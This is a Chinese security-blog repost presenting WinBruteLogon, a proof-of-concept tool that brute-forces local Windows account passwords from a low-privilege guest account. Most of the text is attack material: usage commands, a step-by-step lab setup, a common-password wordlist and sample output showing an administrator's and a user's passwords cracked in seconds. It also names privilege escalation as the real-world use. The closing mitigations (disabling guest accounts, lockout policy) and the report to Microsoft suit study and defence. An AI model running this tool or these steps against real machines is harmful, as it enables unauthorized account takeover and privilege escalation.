【安全工具】Windows用户爆破 蛮力登录(概念证明)

admin
admin
admin
101095
文章
87
评论
2022年7月22日18:33:03评论110 views字数 2867阅读9分33秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

发布日期:2020-05-14


目标:Windows XP 到最新的 Windows 10 版本 (1909)

【安全工具】Windows用户爆破 蛮力登录(概念证明)

弱点 : 

LogonUserA, LogonUserW, CreateProcessWithLogonA,CreateProcessWithLogonW


用法

词表文件

WinBruteLogon.exe -u <username> -w <wordlist_file>


标准输入词表

type <wordlist_file> | WinBruteLogon.exe -u <username> -


介绍

这个 PoC 更像是我所说的 Microsoft Windows 身份验证机制中的一个严重弱点,而不是一个漏洞。
最大的问题与缺乏执行此类操作所需的特权有关。
确实,通过来宾帐户(Microsoft Windows 上最受限制的帐户),您可以破解任何可用本地用户的密码。
使用命令找出存在哪些用户:net user
该 PoC 使用多线程来加速进程并支持 32 位和 64 位。


PoC 测试场景(使用访客账户)

在 Windows 10 上测试

安装和配置全新更新的 Windows 10 虚拟机或物理机。
在我的情况下,完整的 Windows 版本是: 1909 (OS Build 18363.778)
以管理员身份登录并创建两个不同的帐户:一个管理员和一个普通用户。两个用户都是本地用户。
/! 重要提示:我在演示中使用了来宾帐户,但此 PoC 不仅限于来宾帐户,它可以在任何帐户/组(来宾用户/普通用户/管理员用户等...)


创建一个新的管理员用户


net user darkcodersc /addnet user darkcodersc trousers (trousers 是密码)net localgroup administrators darkcodersc /add


创建普通用户

net user HackMe /addnet user HackMe ozlq6qwm (ozlq6qwm 是密码)


创建一个新的访客帐户

net user GuestUser /addnet localgroup users GuestUser /deletenet localgroup guests GuestUser /add


获取词汇表

在我的情况都trousers和ozlq6qwm在SecList:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt


开始攻击

从管理员帐户注销或重新启动您的机器并登录到访客帐户。

将 PoC 可执行文件放在您可以作为访客用户访问的任何位置。


用法 :

WinBruteLogon.exe -v -u <username> -w <wordlist_file>


-v 是可选的,它设计了详细模式。

默认情况下,域名是%USERDOMAIN%env var指定的值。您可以使用选项指定自定义名称-d


破解第一个用户:(darkcodersc管理员)

提示(来宾)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt


等待几秒钟以查看以下结果:

[ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=2260, handle=364[INFO] New "TWorker" Thread created with id=3712, handle=532[DONE] Done.[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06


破解第二个用户:(HackMe普通用户)

提示(来宾)

>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

等待几秒钟以查看以下结果:

[ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=5748, handle=336[INFO] New "TWorker" Thread created with id=4948, handle=140[DONE] Done.[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06

真实世界场景

如果您获得对低权限用户的访问权限,则可以破解更高权限用户的密码并提升您的权限。


缓解(一般)

  • 禁用访客帐户(如果存在)。

  • 应用程序白名单。

  • 按照指南创建并保持密码强度。将此应用于所有用户。

实施安全锁定策略(默认情况下不存在)
打开secpol.msc然后转到Account Policies>Account Lockout Policy并Account lockout threshold使用(1 到 999)中的所需值编辑值。
值表示被锁定之前可能的尝试次数。
/! 锁定策略不适用于管理员帐户。此时,管理员帐户(如果已启用)的最佳保护是设置一个非常复杂的密码。
弱点报告
已向 Microsoft 安全团队发送报告。
他们至少应该在默认情况下实现帐户锁定。其实不然。
项目地址:https://github.com/DarkCoderSc/win-brute-logon

【安全工具】Windows用户爆破 蛮力登录(概念证明)

原文始发于微信公众号(Ots安全):【安全工具】Windows用户爆破 蛮力登录(概念证明)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月22日18:33:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【安全工具】Windows用户爆破 蛮力登录(概念证明)http://cn-sec.com/archives/1105532.html

发表评论

匿名网友 填写信息